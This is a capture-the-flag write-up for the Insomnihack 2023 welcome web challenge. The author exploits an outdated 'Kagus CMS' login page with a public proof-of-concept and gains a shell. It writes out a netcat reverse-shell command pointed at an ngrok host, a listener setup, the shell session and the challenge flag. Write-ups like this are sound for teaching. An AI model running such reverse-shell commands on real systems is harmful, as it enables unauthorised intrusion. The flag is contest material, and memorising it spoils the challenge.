Statement:
! Welcome to Insomnihack 2023 !
Let’s start with an easy and well-known web exploitation.
A hipster welcome for hipster scriptkiddies, here you go!
https://welcome.insomnihack.ch:8443
The URL provided in the statement refers to a login page using the Kagus CMS.
By filling the fields with random values, the server sends me back the following answer :
HTTP/1.1 200 OK
Date: Sat, 21 Jan 2023 14:16:19 GMT
Server: Apache/2.4.54 (Unix) OpenSSL/3.0.7
X-Powered-By: PHP/8.1.14
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 101
This Kagus installation deactivated the login form.<br>It will not be possible to connect through it.
After a few tries, the login page seemed to be secure so I decided to go to the editor’s website present on the footer of the page : https://kagus-cms.com
On the site, in the released page, I see that there was a fix on the login form for the release v23.1.0 :
Our target is still on the v22.4.2 version, it seems exploitable !
The link refers to a git repository containing the POC to exploit this vulnerability.
I start by cloning the git repos and build binary :
git clone https://github.com/Tomat0Soup/Kagus-PoC.git
cd Kagus-PoC && go build
I setup my environment to receive the revshell :
ngrok tcp 1337
nc -lvnp 1337
Then I execute the binary by specifying the target and command : ./kagus_exploit
Target (e.g. https://localhost:9000):
https://welcome.insomnihack.ch:8443
Command (e.g. nc 192.168.0.10 2345 -e sh):
nc 7.tcp.eu.ngrok.io 18603 -e sh
[*] INFO: Preparing to send command: "nc 7.tcp.eu.ngrok.io 18603 -e sh" to "https://welcome.insomnihack.ch:8443"
[*] INFO: Sending request...
[*] INFO: Request sent, status: 504
[*] INFO: The command "%s" should have been executed on %s.
nc 7.tcp.eu.ngrok.io 18603 -e sh https://welcome.insomnihack.ch:8443/admin/api/v22.4/users/createUserAccount.php
I get my revshell, I just have to cat the flag :
Listening on 0.0.0.0 1337
Connection received on 127.0.0.1 38762
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
ls
createUserAccount.php
info_flag
cat info_flag
The flag is located at /flag.txt
cat /flag.txt
INS{N3V3r_7Ru57_917HUb_r3l34532!_4lw4Y2_KoMP1L3_7H3M}
Flag: INS{N3V3r_7Ru57_917HUb_r3l34532!_4lw4Y2_KoMP1L3_7H3M}